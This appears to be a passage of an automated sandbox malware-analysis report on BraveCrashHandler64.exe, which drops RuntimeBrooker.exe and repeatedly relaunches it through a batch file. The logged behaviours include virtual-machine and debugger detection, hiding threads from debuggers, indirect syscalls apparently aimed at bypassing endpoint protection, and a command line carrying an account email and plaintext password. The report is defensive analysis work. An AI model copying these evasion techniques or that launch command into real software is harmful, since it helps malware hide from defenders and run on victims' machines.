Source: RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: VBoxService.exe
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Virtual MachinesbiedllVBoxService.exe
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000011.00000002.1431514591.0000028BC3770000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllot #
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: VMWare
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe

Open window title or class name: ollydbg

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	File opened: SIWDEBUG
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	File opened: NTICE
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	File opened: SICE

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process queried: DebugPort

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	NtProtectVirtualMemory: Indirect: 0x2ADDFAA
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	NtProtectVirtualMemory: Indirect: 0xEF513B
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	NtSetInformationThread: Indirect: 0xEACE3D

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\12605RR4.bat" "C:\Users\user\Desktop\BraveCrashHandler64.exe""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 1252	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
